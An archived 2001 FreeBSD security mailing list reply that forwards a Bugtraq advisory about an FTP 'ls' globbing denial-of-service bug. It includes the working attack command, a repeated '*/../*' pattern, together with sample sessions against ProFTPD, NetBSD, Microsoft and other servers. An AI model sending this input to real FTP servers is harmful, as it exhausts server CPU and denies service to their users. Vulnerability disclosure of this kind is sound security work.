Date: Fri, 16 Mar 2001 13:56:08 -0000 From: Lee Smallbone <lee@kechara.net> To: freebsd-security@freebsd.org Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <200103161502.PAA16561@mailgate.kechara.net>
next in thread | raw e-mail | index | archive | help
4.2-RELEASE, regular user, regular home directory (snipped) /../www/62.49.139.3_3-year.png www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/62.49.139.3_3.html www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/btareshit.png www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www /../www/62.49.139.3_3.old 226 Transfer complete. ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec. ftp> 15/03/2001 22:21:16, Attila Nagy <bra@fsn.hu> wrote: >FreeBSD isn't listed, but also vulnerable, at least with the FTPd in >-STABLE. > >---------- Forwarded message ---------- >Date: Thu, 15 Mar 2001 09:34:09 +0100 >From: "Frank DENIS (Jedi/Sector One)" <j@4U.NET> >To: BUGTRAQ@SECURITYFOCUS.COM >Subject: Multiple vendors FTP denial of service > >- Proftpd built-in 'ls' command has a globbing bug that allows remote >denial-of-service. > > Here's a simple exploit, tested on the Proftpd site : > >$ ftp ftp.proftpd.org >... >Name (ftp.proftpd.org:j): ftp >... >230 Anonymous access granted, restrictions apply. >Remote system type is UNIX. >Using binary mode to transfer files. >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >227 Entering Passive Mode (216,10,40,219,4,111). >421 Service not available, remote server timed out. Connection closed > > That command takes 100% CPU time on the server. It can lead into an easy >DOS even if few remote simultanous connections are allowed. > > Other FTP servers may be concerned as well. Here are various tries : > >- NetBSD FTP showed the same behavior than Proftpd : > >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >200 EPRT command successful. >(long delay) >421 Service not available, remote server timed out. Connection closed > >So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a >possible DOS. Other BSD FTP may be affected as well. > >- Microsoft FTP Service (Version 5.0) seems also confused by the command : >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >500 'EPSV': command not understood >227 Entering Passive Mode (207,46,133,140,4,223). >200 PORT command successful. >150 Opening ASCII mode data connection for file list. >(very long delay... nothing happens...) > >- Publicfile refuses the command : > >ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >227 =131,193,178,181,97,222 >550 Sorry, I can't open that file: file does not exist. > >- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and >displayed. > >- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard >expression to *" and the 'ls *' output. > > > Maintainers of vulnerable servers have been warned of this bug. > >-- > -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=- > LINAGORA SA (Paris, France) : http://www.linagora.com > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200103161502.PAA16561>